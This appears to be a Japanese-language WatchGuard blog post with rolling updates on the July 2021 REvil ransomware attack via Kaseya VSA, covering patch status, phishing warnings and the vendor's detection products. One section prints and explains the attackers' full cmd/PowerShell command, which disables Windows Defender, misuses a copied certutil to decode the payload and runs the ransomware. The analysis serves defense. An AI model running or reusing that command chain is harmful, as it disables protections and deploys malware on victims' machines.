2021/07/02

緊急速報: MSP を標的としたランサムウェア攻撃が進行中 (Kaseya)

2021 年 7 月 2 日 Corey Nachreiner 著

マネージドサービスプロバイダ (MSP)、特に Kaseya VSA を使用している企業は、当記事を読み、できる限り迅速に対応してください。

概要

7 月 2 日金曜日に、Kaseya VSA のオンプレミス版を使用しているいくつかの MSP がランサムウェアの攻撃を受け、顧客にも影響を及ぼしました。Kaseya によれば、MSP の顧客を含む約 1500 社 (現時点) が被害を受け、攻撃者 (Revil グループ) は 7000 万ドルの身代金を要求しているとのことです。この攻撃は、Kaseya 製品の未パッチの脆弱性を利用したもので、Kaseya は早急に修正に取り組んでいます。オンプレミスの Kaseya VSA サーバ (SaaS バージョンには影響しないようです) を使用している方は、Kaseya が修正プログラムをリリースするまで、サーバをオフにするか、ネットワークから削除してください。WatchGuard EPDR、Panda AD360 などの WatchGuard のエンドポイント製品は、ドロップされたランサムウェアを検知することができます。元の記事は 7 月 2 日金曜日に公開されましたが、新しい情報が入り次第更新いたします。一番下までスクロールすると最初の記事が表示され、一番上に最新の更新情報が表示されます。

アップデート 7: TDR による保護と Kaseya 関連のフィッシング (2021 年 7 月 9 日、8:30am PT)。

Kaseya VSA SaaS サービスはまだ復旧しておらず (日曜日を予定)、パッチもまだ提供されていませんが、警告を含め、紹介すべきいくつかの関連アップデートがあります。まずは警告です。

Kaseya は、攻撃者が偽の Kaseya アップデートやこの事件に関する勧告を装ったスパムやフィッシングメールを送付している事例が見られる、と警告しています。このメールには、悪意のあるリンクや添付ファイルが含まれている可能性があります。Kaseya を名乗る電子メールは常に疑い、可能な限り検証するようにしてください (送信者ドメインとコンテンツに注意してください)。Kaseya は今後、送信するアップデートメールにはリンクや添付ファイルを含めないことを約束しています。もしこのようなメールを受け取った場合は、悪意のあるメールである可能性があります。

次は、良いニュースです。当社のエンドポイント製品が Kaseya ランサムウェアをどのように検出したか記事で紹介したのち、Firebox Threat Detection and Response (TDR) サービスおよびエージェントが、Kaseya ランサムウェアを検出できるかどうかについて多くの問い合わせがありました。結論としては、複数の方法で検出が可能です。前述のとおり、APT Blocker サービスは、Kaseya ランサムウェアがリリースされた日に検出をしました。APT Blocker を使用するように TDR を設定していればそれだけで検出されたはずです。TDR の Host Ransomware Prevention (HRP) 機能もテストしました。これは、HRP がすべての実行中のプロセスに適用する行動分析モデルです。HRP は Kaseya ランサムウェアにも適用され、ファイルが暗号化されるのを防ぎました。事件発覚後にすべての脅威のシグネチャと IoC (セキュリティ侵害の痕跡情報) を当社の脅威インテリジェンスに追加していますが、これとは無関係に、上記の機能のいずれかによって保護が行われていたはずです。

前述した通り、Kaseya がパッチのリリースを開始した時点で、すぐに共有いたします。

TDR の HRP が Kaseya ランサムウェアを検出

アップデート 6: Kaseya のリリースが遅延、人が計画すれば、神は笑う (2021 年 7 月 7 日午後4 時、PT)

「人が計画すれば、神は笑う」ということわざがあります。最善の計画が現実の世界で思い通りに実行されるとは限らない、という意味です。この記事では、VSA SaaS サービスの復旧とオンプレミス版のパッチの両方に関する Kaseya の暫定的なアップデートを共有してきました。Kesaya は、当記事の前回のアップデートで共有した日時のいくつかには間に合わないようです。さらなる詳細を述べた CEO からのビデオを顧客宛にメールで送信するとのことですが、オンプレミス版 VSA のパッチは本日中には配信されないようです (SaaS サービスも復旧していません)。以降は、すべての更新情報 (実行がまだのものも含む) を共有せず、パッチのリリースや SaaS サービスの復旧が確実に行われるまでは当記事の更新を行いません。暫定的な更新情報のすべてを知りたい場合は、同社のアドバイザリ記事をご覧ください。

しかし本日 Kaseya が果たした約束の 1 つは、オンプレミスの VSA 管理者が、いずれ公開されるパッチに備えて行うべきことをまとめた「ランブック」です。Kaseya の顧客には今晩中にメールで届く予定です。このランブックには、次のような内容が含まれています。

  • VSA サーバをネットワークやインターネットから隔離する手順
  • Kaseya の検出ツールを実行する手順
  • OS にパッチを適用し、最新の状態にする手順
  • IIS に必要な変更の詳細
  • VSA サーバ上における FireEye エージェントのダウンロード手順
  • VSA サーバに FireEye エージェントを実装する手順
  • 新しい VSA リリースをインストールする前のチェックリスト最終確認

オンプレミス製品を使用している場合は、パッチが公開された際にできるだけ迅速にサーバにパッチを適用し、サービスを復元するため、ランブックの手順に従うことをお勧めします。

アップデート 5: Kaseya VSA SaaS は未だダウン、本日パッチを適用か (2021 年 7 月 7 日、午前 11 時 PT)

Kaseya による作業は開始されているものの、SaaS VSA サービスの復旧に技術的な問題が発生したため、遅延が発生しています。Kaseya は現在、SaaS の復旧プロセスを「米国時間の 7 月 8 日木曜日の夕方までに」開始する予定です。ただし、SaaS サービスの復旧は遅れていますが、オンプレミスの VSA に対するパッチは進んでいるようです。オンプレミスの VSA に対する変更点をまとめたランブックが米国時間の本日正午 PT (午後 3 時 ET)までに公開される予定で、パッチ適用は米国時間の午後 2 時 PT (午後 5 時 ET)までに実施するとしています。パッチが確認され次第、この記事を更新します。

アップデート 4: Kaseya VSA クラウドサービスがオンラインに復帰 (2021 年 7 月 6 日、午後 6 時 PT)

Kaseya はメインのアドバイザリページを更新し、クラウド VSA サービスをオンラインに戻し始めたこと、そして保護のための多くのセキュリティの追加について知らせています。Kaseya は、VSA SaaS インフラストラクチャ全体が 7 月 7 日午前 6 時 ET までに完全にオンラインで復旧すると考えています。今回の攻撃が影響するオンプレミスの VSA ユーザにとってより重要なことは、Kaseya は SaaS サービスの復旧後、24 時間 (またはそれ以下) 以内にオンプレミスの VSA 用パッチのリリースを約束していることです。つまり、VSA のパッチは、良くて明日、悪ければ木曜日の午前 6 時 ET にはリリースされると予想されます。前述のとおり、これらのパッチがリリースされるまで、オンプレミスの VSA サーバをオフラインにしておく必要があります。パッチが公開され次第、このページでお知らせします。

アップデート 3: 脆弱性の詳細が明らかに (2021 年 7 月 6 日)。

米国の長期休暇の終了に伴い、この事件の詳細が続々と発表されています。現在は、ランサムウェアのインストールには、Kaseya VSA のオンプレミス版におけるいくつかの未パッチの脆弱性が悪用された可能性が高いことが確認されています。セキュリティリサーチ会社である DIVD 社は、このランサムウェア攻撃の前に、Kaseya VSA 製品にいくつかの脆弱性を発見し、報告していました。Kaseya はその修正に取り組んでいたとのことですが、Revil ランサムウェアグループが先を越したようです。DIVD は、パッチが適用可能になるまで技術的な詳細は共有されませんが 、コミュニティでは、脆弱性には認証前のインジェクションの脆弱性 (おそらく SQL インジェクション) と任意のファイルアップロードの問題が含まれているのではないかと考えられます。今回の攻撃には、DIVD の調査結果以外にも他の問題が関与している可能性があります。Kaseya は依然として VSA サーバをオフラインにしておくことを推奨していますが、これらの欠陥に対するパッチがまもなく出ることが期待されます。Kaseya は、SaaS サービスが復帰してから 24 時間以内にリリースすると発表していますが、それは明日 (7 月 7 日水曜日) になりそうです。DIVD が共有した内容の詳細については、この記事の下にあるセクションをご参照ください。

DIVD の新しい情報以外にも、Huntress Labs社が定期的なアップデートやその他の技術情報を含む優れた詳細記事を掲載しています。そちらも下のセクションでご覧ください。

また TrueSec 社は、影響を受けた Kaseya システムを特定し、緩和するための優れたツールをリリースしています。

アップデート 2: 2021 年 7 月 3 日時点の技術的・製品アップデート

昨日の午後、マネージドサービスプロバイダ (MSP) とその顧客に影響を与えるランサムウェアの攻撃の発生についてお知らせしました。今回はそのアップデートとして、技術的な詳細や製品の保護情報に加え、Panda Research チームが Adaptive Defense 360 (AD360) や Cytomic 製品からの脅威情報を用いて行った分析についてもご紹介します。

技術的な詳細に入る前に、WatchGuard の高次の製品保護について解説します。当社のネットワークとエンドポイントの両ソリューションには、今回の攻撃でドロップされた悪意のあるランサムウェアのエンクリプタ (agent.exe) を特定できる保護機能が備わっています。今回の攻撃が最初に検知された際も、プロアクティブなふるまいベースのサンドボックスである APT Blocker は、このランサムウェアのファイルを悪意のあるものとして識別できました。当社の Gateway Antivirus (GAV) サービスでもこれを同様に検出しています。エンドポイント側では、AD360 (WatchGuard EPDR) と Cytomic もこの脅威を検知することができます。悪意のある agent.exe ファイルの特定に加え、AD360 の Contextual Engine は、侵害された Kaseya エージェントが試みる悪意のあるアクションの多くを検出します。以下に研究の詳細を紹介します。ただし、コミュニティはこの侵害の最終的な根本原因をまだ把握していません。Kaseya VSA の脆弱性 (おそらくアップデートメカニズムに関連するもの) ではないかと考える意見が多数派です。攻撃がどのように始まるかが不明なため、ウォッチガードのネットワーク製品のスキャンがどの時点で役に立つかはわかりませんが、当社のエンドポイント製品を Kaseya VSA サーバで使用している場合 (オンプレミスのものを使用している場合は)、保護されています。

以下で、当社の Panda (エンドポイント) 脅威ハンティング、研究チームが発見した技術的な詳細について説明します。

インシデントの概要

当社のテレメトリでは、攻撃は 7 月 2 日 13 時 56 分 (UTC) に初めて確認されました。これはウォッチガードのお客様に関与するものでしたが、コミュニティの他の場所でこの攻撃が観測された時間とほぼ一致しています。

Kaseya の攻撃が当社のテレメトリで最初に観測された様子。画像は WatchGuard/Panda Orion ツールが出典。

コミュニティは、侵害されたKaseyaエージェント (agent.exe) が被害者のコンピュータに侵入した方法について根本的な原因を特定していませんが (Kaseya の脆弱性の可能性がある)、攻撃が以下の 7 つのアクションを実行する悪意のある cmd.exe (Windows CLI) コマンドから始まることが判明しています。

“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 5388 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode C:\*REDACTED_TEMP*\agent.crt C:\*REDACTED_TEMP*\agent.exe & del /q /f C:\*REDACTED_TEMP*\agent.crt C:\Windows\cert.exe & C:\*REDACTED_TEMP*\agent.exe

以下は、このコマンドに含まれる 7 つのアクションの分析です。

  1. ping 127.0.0.1 -n 5388 > null
    • このコマンドは、複数コマンドに対応していないセキュリティソフトに対する回避技術として、また、攻撃を実行する前にスリープを行うために使用されます。
  2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    • この PowerShell コマンドは、Windows Defender の保護機能を無効にします。
  3. copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
    • このコマンドは、システムの certutil を OS のパスにコピーします。その特定の方向が、一部のエンドポイントセキュリティ製品の分析から除外されることが多いためです。
  4. echo %RANDOM% >> C:\Windows\cert.exe
    • これは、オリジナルのバイナリを変更することで、標準的なインストールパスの外にあるシステムバイナリを識別する検出システムの回避をしようとする技術です。
  5. C:\Windows\cert.exe -decode C:\*REDACTED_TEMP*\agent.crt C:\*REDACTED_TEMP*\agent.exe
    • これは、悪意のあるバイナリを元の場所からデコードし、目的のパスにあるマルウェア (ランサムウェアデクリプタ) の名前を変更します。
  6. del /q /f C:\*REDACTED_TEMP*\agent.crt C:\Windows\cert.exe
    • 手順 4、5 で不要になったファイルを削除します。
  7. C:\*REDACTED_TEMP*\agent.exe
    • 最後に、PowerShell コマンドにより、実際のランサムウェアである、悪意のある agent.exe ファイルを実行します。

CMD.EXE の PowerShell 実行を可視化したもの。画像は WatchGuard/Panda Orion ツールが出典。

実行された agent.exe は、MsMpEng.exe と mpsvc.dll というファイルを、Windows のデフォルトパス (%Windir% またはシステムルート) に生成します。

  • mpsvc.dll は、Revil ファミリーに属する悪質な DLL です。つまりランサムウェアのエンクリプタです。
  • MsMpEng はこの攻撃で使用される Microsoft Defender の古いバージョンですが、現在も有効です。この攻撃では、ランサムウェア DLL のハイジャックを行なっています。

最後に MsMpEng.exe が実行され、コンピュータのコンテンツが暗号化されます。

Adaptive Defense Contextual Engine による保護

当社の Adaptive Defense 360、Cytromic、または WatchGuard EPDR 製品を使用している場合、各ソリューションの Contextual Engine は、この脅威に対してさまざまな保護を提供します。例えば危険な Kaseya エージェントによって起動された最初の CMD.EXE コマンドを不審なものとして検出し、最初のステップをブロックして、この攻撃からコンピュータを保護します。

Contextual Engine は、悪意のある CMD.EXE の実行を検出します。画像はWatchGuard/Panda Orion ツールが出典。

また、Contextual Engine は、悪意のある PowerShell コマンドの実行を検出します。

Contextual Engine が悪意のある PowerShell を検出。画像は WatchGuard/Panda Orion ツールが出典。

さらに、AD360 を Block Mode で設定した場合、攻撃のさまざまなステップで使用される多くの関連ファイルが「不明」に分類され、阻止されます。具体的には以下が行われます。

  • 修正された cert.exe の実行 (ステップ 5)。
  • デコードされた agent.exe の実行 (ステップ 7)。
  • agent.exe の実行時に Revil のDLL (mpsvc.dll) をロードする。

要約すると、Adaptive Defense は、Contextual Engine と Block Mode の両方の保護機能により、この攻撃を検知、防止することができます。当社の EPP および Panda Dome ソフトウェアも、この Contextual Engine 保護機能を持っています。

要約

WatchGuard (Panda) のエンドポイント製品を使用している場合、今回の Kaseya の攻撃で使用されたマルウェアからは保護されます。ウォッチガードのネットワーク (Firebox) 製品は、ウォッチガードのプロキシが処理するネットワークサービスを介して送信された際に、このマルウェアを検出します。とはいえ、この Kaseya サプライチェーン攻撃の根本的な原因が判明しない限り、この脅威がネットワークにどのように侵入するかを把握することは容易ではありません。発見され次第、すぐに共有いたします。Kaseya のオンプレミス VSA サーバを使用している場合は、Kaseya からの詳しい説明がなされるまでオフにするか、ネットワークから取り除くべきです。Kaseya はすでにクラウド版を無効にしています。なお、Kaseya は昨日から自社のアドバイザリを更新していますので、定期的にチェックすることをお勧めします。詳細がわかり次第、このページでお知らせします。

この記事の追加情報を提供してくれた Panda Research チームとWatchGuard Threat Labsに謝意を表します。

元の投稿: 2021 年 7 月 2 日
金曜日の昼、米国では長い祝日の週末を前に、MSP を標的にしたランサムウェア攻撃が進行中であることが発見されました。この攻撃は、これまでに 8 つの MSP に影響を与えたと言われており、Kaseya の VSA ソリューションの脆弱性や設定ミスを利用している可能性があります。Kaseya VSA を使用している場合、Kesaya から更なる通知があるまで直ちにサーバをシャットダウンすることをお勧めします。また、サイバーセキュリティとインフラストラクチャセキュリティ機関からも、この件に関する注意喚起がなされています。

これは現在進行中の攻撃であり、詳細についてはまだ把握できていません。Huntress Labs社は Reddit で、r/MSP というサブレディットに優れた投稿を作成しており、問題の進展に合わせて、コミュニティが共有するすべての詳細情報を集約しています。MSP の皆様は、より詳細な情報が公開されるまで、この投稿を頻繁にご覧になることを強くお勧めします。この投稿では、IoC (セキュリティ侵害の痕跡情報) やその他の情報も共有されていますので、ご自身の保護にお役立てください。今回の攻撃は、以前にも記事にしたランサムウェア「REvil」と同じグループによるものと思われます。ウォッチガードでは、これらの IoC を追跡し、当社のセキュリティ管理がそれらを識別できるようにしていきます。来週、さらに詳細な情報をお伝えします。それまで、MSP 向けのいくつかの参考資料を以下に紹介します。

参考:
・Kaseya による最新情報 – Kaseya
・Kaseya のサブレディット投稿 – Reddit
・MSP のサブレディット投稿 – Reddit
・この問題を取り上げた記事 – The Record
・Huntress の事件の詳細。 – Huntress
・影響を受けたサーバを特定して緩和するツール – GitHub
・DIVD による Kaseya に関する警告 – DIVD
・DIVD による Kaseya に関するアップデート – DIVD
・DIVD による Kaseya に関するアップデート2 – DIVD
・DIVD による Kaseya に関するアップデート3 – DIVD

スパムメール対策機能強化のためのエンジン移行について(2021/4/1)